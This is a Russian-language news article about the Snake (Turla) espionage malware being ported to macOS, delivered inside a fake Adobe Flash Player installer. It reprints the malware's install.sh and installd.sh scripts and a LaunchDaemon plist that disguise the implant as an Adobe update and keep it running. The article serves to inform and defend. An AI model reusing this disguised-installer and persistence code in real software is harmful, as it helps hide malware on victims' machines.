Виммельбух, 3, перетяжка
Виммельбух, 3, перетяжка
Виммельбух, 3, перетяжка

Широкоизвестная вредоносная программа «Snake» была портирована на Mac

Новости Отредактировано

Snake является вредоносным фреймворком для направленных атак. Раньше были известны версии малвари для Windows и Linux, но недавно нашлась и «яблочная».

687 открытий719 показов

Snake, также известный как Turla, Uroburos и Agent.BTZ, является сложным вредоносным фреймворком для направленных атак. Ранее фреймворк был нацелен только на Windows. В 2014 году его версия появилась и на Linux-системах. Теперь же появилась и модификация для macOS.

О вирусе Snake

По мнению экспертов из Fox-IT и Palo Alto Networks, троян был разработан российской группировкой Turla. Вирус является заменой трояну Uroburos, который был уничтожен в 2014 году исследователями из G Data. Троян разработан с помощью .NET Framework, существуют версии для Windows, Mac и Linux. Версия для Windows была названа Kazuar, исходный код которой указывает на существование этого вируса для Linux. Mac-версия же получила название Snake.

Принцип работы

Данный вирус работает по известному принципу. Он обращается за командами к C&C-серверу по вшитому адресу. Особенностью этого трояна является команда remote. Она запускает web-сервер на зараженном хосте, предоставляя API для удаленных соединений. Таким образом атакующий сервер может в любое время отправлять команды вирусу.

У такого подхода есть два плюса:

  1. Возможность для атакующего сервера мигрировать на другой C&C-сервер.
  2. Вирус способен обходить некоторые решения безопасности.

Функциональность

Для версии под Windows архитектура Snake состояла из драйвера ядра, который скрывал присутствие компонентов Snake и предоставлял низкоуровневый доступ к сетям.

Версия для macOS является портом с Windows. По прежнему присутствуют ссылки в двоичном виде на проводник, Internet Explorer и именованные каналы.

Установка

Код Snake находится внутри архива Adobe Flash Player.app.zip, который является взломанной версией установщика Flash Player.

Код скрипта install.sh:

			#!/bin/sh
SCRIPT_DIR=$(dirname "$0")
TARGET_PATH=/Library/Scripts
TARGET_PATH2=/Library/LaunchDaemons
cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue"
cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp"
cp -f "${SCRIPT_DIR}/installd.sh" "${TARGET_PATH}/installd.sh"
cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist"
"${TARGET_PATH}/installd.sh"
"${SCRIPT_DIR}/Install Adobe Flash Player"
exit $RC
		

Вызываемый файл installd.sh cодержит следующий код:

			#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
FILE="${SCRIPT_DIR}/queue#1"
PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`
if [ -z "$PIDS" ]; then
${SCRIPT_DIR}/installdp ${FILE} n
fi
		

Оболочка скрипта проверяет, запущен ли installdp, и запускает его в обратном случае:

			/Library/Scripts/installdp /Library/Scripts/queue#1 n
		

Поддержка

Лазейка поддерживается с помощью службы LaunchDaemon:

			$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist
{
"ProgramArguments" => [
0 => "/Library/Scripts/installd.sh"
]
"KeepAlive" => 1
"Label" => "com.apple.update"
"OnDemand" => 1
"POSIXSpawnType" => "Interactive"
}
		

Влияние

Apple весьма быстро решили проблему с этим вирусом путем отмены сертификата, поэтому данный установщик не несет никакой опасности.

Однако, если вы были инфицированы, то стоит помнить, что могли быть украдены ваши файлы и пароли. В связи с этим следует очистить компьютер от вируса, а затем заменить все свои пароли.

Следите за новыми постами
Следите за новыми постами по любимым темам
687 открытий719 показов